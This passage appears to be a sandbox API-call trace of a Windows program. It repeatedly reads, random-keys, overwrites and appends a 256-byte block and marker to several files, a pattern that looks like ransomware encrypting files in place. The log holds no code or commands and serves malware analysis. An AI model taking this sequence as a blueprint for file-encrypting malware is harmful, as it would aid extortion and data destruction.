returned 0x7d12378 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.612] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.613] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.613] GetProcessHeap () returned 0x4f10000 [0077.613] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0077.613] GetProcessHeap () returned 0x4f10000 [0077.613] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.613] GetProcessHeap () returned 0x4f10000 [0077.613] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0077.613] GetProcessHeap () returned 0x4f10000 [0077.613] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0077.613] GetProcessHeap () returned 0x4f10000 [0077.613] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0077.613] GetProcessHeap () returned 0x4f10000 [0077.613] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0077.613] GetProcessHeap () returned 0x4f10000 [0077.613] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f980 [0077.613] GetProcessHeap () returned 0x4f10000 [0077.613] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0077.613] GetProcessHeap () returned 0x4f10000 [0077.613] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.613] GetProcessHeap () returned 0x4f10000 [0077.613] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f980 | out: hHeap=0x4f10000) returned 1 [0077.613] GetProcessHeap () returned 0x4f10000 [0077.613] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.613] GetProcessHeap () returned 0x4f10000 [0077.613] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.613] GetProcessHeap () returned 0x4f10000 [0077.613] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.613] GetProcessHeap () returned 0x4f10000 [0077.613] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.613] GetProcessHeap () returned 0x4f10000 [0077.613] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.613] GetProcessHeap () returned 0x4f10000 [0077.613] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.614] GetProcessHeap () returned 0x4f10000 [0077.614] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.614] GetProcessHeap () returned 0x4f10000 [0077.614] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.614] GetProcessHeap () returned 0x4f10000 [0077.614] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.614] GetProcessHeap () returned 0x4f10000 [0077.614] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.614] GetProcessHeap () returned 0x4f10000 [0077.614] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.614] GetProcessHeap () returned 0x4f10000 [0077.614] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.614] GetProcessHeap () returned 0x4f10000 [0077.614] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.614] GetProcessHeap () returned 0x4f10000 [0077.614] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.614] GetProcessHeap () returned 0x4f10000 [0077.614] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.614] GetProcessHeap () returned 0x4f10000 [0077.614] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.614] GetProcessHeap () returned 0x4f10000 [0077.614] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.614] GetProcessHeap () returned 0x4f10000 [0077.614] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.614] GetProcessHeap () returned 0x4f10000 [0077.614] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.614] GetProcessHeap () returned 0x4f10000 [0077.614] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.624] GetProcessHeap () returned 0x4f10000 [0077.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.624] GetProcessHeap () returned 0x4f10000 [0077.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.624] GetProcessHeap () returned 0x4f10000 [0077.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.624] GetProcessHeap () returned 0x4f10000 [0077.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.624] GetProcessHeap () returned 0x4f10000 [0077.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0077.624] GetProcessHeap () returned 0x4f10000 [0077.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.624] GetProcessHeap () returned 0x4f10000 [0077.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0077.624] GetProcessHeap () returned 0x4f10000 [0077.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0077.624] GetProcessHeap () returned 0x4f10000 [0077.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0077.624] GetProcessHeap () returned 0x4f10000 [0077.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0077.624] SetFilePointerEx (in: hFile=0x7d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.624] WriteFile (in: hFile=0x7d8, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0077.625] WriteFile (in: hFile=0x7d8, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0077.625] GetProcessHeap () returned 0x4f10000 [0077.625] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0077.625] GetProcessHeap () returned 0x4f10000 [0077.625] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0077.625] GetProcessHeap () returned 0x4f10000 [0077.625] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0077.625] CloseHandle (hObject=0x7d8) returned 1 [0077.626] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 25 [0077.626] SetFilePointerEx (in: hFile=0x7e0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.626] ReadFile (in: hFile=0x7e0, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0077.626] SetFilePointerEx (in: hFile=0x7e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.627] GetProcessHeap () returned 0x4f10000 [0077.627] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0077.627] GetProcessHeap () returned 0x4f10000 [0077.627] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0077.627] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0077.627] GetProcessHeap () returned 0x4f10000 [0077.627] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0077.627] ReadFile (in: hFile=0x7e0, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0077.674] SetFilePointerEx (in: hFile=0x7e0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.675] WriteFile (in: hFile=0x7e0, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0077.675] GetProcessHeap () returned 0x4f10000 [0077.675] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0077.675] GetProcessHeap () returned 0x4f10000 [0077.675] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.675] GetProcessHeap () returned 0x4f10000 [0077.675] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0077.675] GetProcessHeap () returned 0x4f10000 [0077.675] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.675] GetProcessHeap () returned 0x4f10000 [0077.675] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0077.675] GetProcessHeap () returned 0x4f10000 [0077.675] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.675] GetProcessHeap () returned 0x4f10000 [0077.675] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.675] GetProcessHeap () returned 0x4f10000 [0077.675] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.675] GetProcessHeap () returned 0x4f10000 [0077.675] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.675] GetProcessHeap () returned 0x4f10000 [0077.675] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.675] GetProcessHeap () returned 0x4f10000 [0077.675] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.675] GetProcessHeap () returned 0x4f10000 [0077.675] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.675] GetProcessHeap () returned 0x4f10000 [0077.675] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.675] GetProcessHeap () returned 0x4f10000 [0077.675] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.675] GetProcessHeap () returned 0x4f10000 [0077.676] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.676] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.676] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.676] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.676] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.676] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.676] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.676] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.676] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.676] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.676] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.676] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.676] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.676] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.676] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.676] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.676] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.676] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.676] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.676] GetProcessHeap () returned 0x4f10000 [0077.677] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.677] GetProcessHeap () returned 0x4f10000 [0077.677] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.677] GetProcessHeap () returned 0x4f10000 [0077.677] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.677] GetProcessHeap () returned 0x4f10000 [0077.677] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.677] GetProcessHeap () returned 0x4f10000 [0077.677] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.677] GetProcessHeap () returned 0x4f10000 [0077.677] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0077.677] GetProcessHeap () returned 0x4f10000 [0077.677] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.677] GetProcessHeap () returned 0x4f10000 [0077.677] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0077.677] GetProcessHeap () returned 0x4f10000 [0077.677] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0077.677] GetProcessHeap () returned 0x4f10000 [0077.677] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0077.677] GetProcessHeap () returned 0x4f10000 [0077.677] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0077.677] GetProcessHeap () returned 0x4f10000 [0077.677] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0077.677] GetProcessHeap () returned 0x4f10000 [0077.677] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0077.677] GetProcessHeap () returned 0x4f10000 [0077.677] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.677] GetProcessHeap () returned 0x4f10000 [0077.677] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0077.677] GetProcessHeap () returned 0x4f10000 [0077.678] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.678] GetProcessHeap () returned 0x4f10000 [0077.678] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.678] GetProcessHeap () returned 0x4f10000 [0077.678] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.678] GetProcessHeap () returned 0x4f10000 [0077.678] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.678] GetProcessHeap () returned 0x4f10000 [0077.678] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.678] GetProcessHeap () returned 0x4f10000 [0077.678] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.678] GetProcessHeap () returned 0x4f10000 [0077.678] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.678] GetProcessHeap () returned 0x4f10000 [0077.678] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.678] GetProcessHeap () returned 0x4f10000 [0077.678] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.678] GetProcessHeap () returned 0x4f10000 [0077.678] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.678] GetProcessHeap () returned 0x4f10000 [0077.678] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.678] GetProcessHeap () returned 0x4f10000 [0077.678] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.678] GetProcessHeap () returned 0x4f10000 [0077.678] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.678] GetProcessHeap () returned 0x4f10000 [0077.678] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.678] GetProcessHeap () returned 0x4f10000 [0077.679] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.679] GetProcessHeap () returned 0x4f10000 [0077.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.679] GetProcessHeap () returned 0x4f10000 [0077.679] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.679] GetProcessHeap () returned 0x4f10000 [0077.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.679] GetProcessHeap () returned 0x4f10000 [0077.679] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.679] GetProcessHeap () returned 0x4f10000 [0077.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.679] GetProcessHeap () returned 0x4f10000 [0077.679] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.679] GetProcessHeap () returned 0x4f10000 [0077.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.679] GetProcessHeap () returned 0x4f10000 [0077.679] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.679] GetProcessHeap () returned 0x4f10000 [0077.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.679] GetProcessHeap () returned 0x4f10000 [0077.679] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0077.679] GetProcessHeap () returned 0x4f10000 [0077.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.679] GetProcessHeap () returned 0x4f10000 [0077.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0077.679] GetProcessHeap () returned 0x4f10000 [0077.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0077.679] GetProcessHeap () returned 0x4f10000 [0077.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0077.679] GetProcessHeap () returned 0x4f10000 [0077.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0077.680] SetFilePointerEx (in: hFile=0x7e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.680] WriteFile (in: hFile=0x7e0, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0077.680] WriteFile (in: hFile=0x7e0, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0077.680] GetProcessHeap () returned 0x4f10000 [0077.680] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0077.680] GetProcessHeap () returned 0x4f10000 [0077.680] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0077.680] GetProcessHeap () returned 0x4f10000 [0077.680] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0077.680] CloseHandle (hObject=0x7e0) returned 1 [0077.681] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 26 [0077.681] SetFilePointerEx (in: hFile=0x7e4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.681] ReadFile (in: hFile=0x7e4, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0077.681] SetFilePointerEx (in: hFile=0x7e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.682] GetProcessHeap () returned 0x4f10000 [0077.682] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0077.682] GetProcessHeap () returned 0x4f10000 [0077.682] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0077.682] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0077.682] GetProcessHeap () returned 0x4f10000 [0077.682] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0077.682] ReadFile (in: hFile=0x7e4, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0077.736] SetFilePointerEx (in: hFile=0x7e4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.736] WriteFile (in: hFile=0x7e4, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.737] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.737] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.737] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.737] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.737] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.737] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.737] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.737] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.737] RtlAllocateHeap 